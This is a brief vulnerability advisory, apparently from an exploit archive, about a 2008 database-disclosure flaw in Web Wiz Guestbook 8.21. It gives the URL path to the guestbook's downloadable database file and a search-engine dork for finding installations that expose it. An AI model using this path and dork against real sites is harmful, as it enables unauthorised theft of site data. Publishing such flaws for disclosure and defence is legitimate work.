id: 4476
date: 12/16/2008
title: Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD Vulnerability
author: Cold Zero
cves: 

==========================================================
Web Wiz Guestbook 8.21 (WWGguestbook.mdb) DD Vulnerability
==========================================================


< > =============
< >
< >  Web Wiz Guestbook v8.21 (WWGguestbook.mdb) Remote Database Disclosure Vulnerability
< >
< >  http://site.com/[Path]/database/WWGguestbook.mdb
< >
< >  Dork : webwizguestbook_license.asp
< >
< > =============



#  0day.today [2023-03-26]  #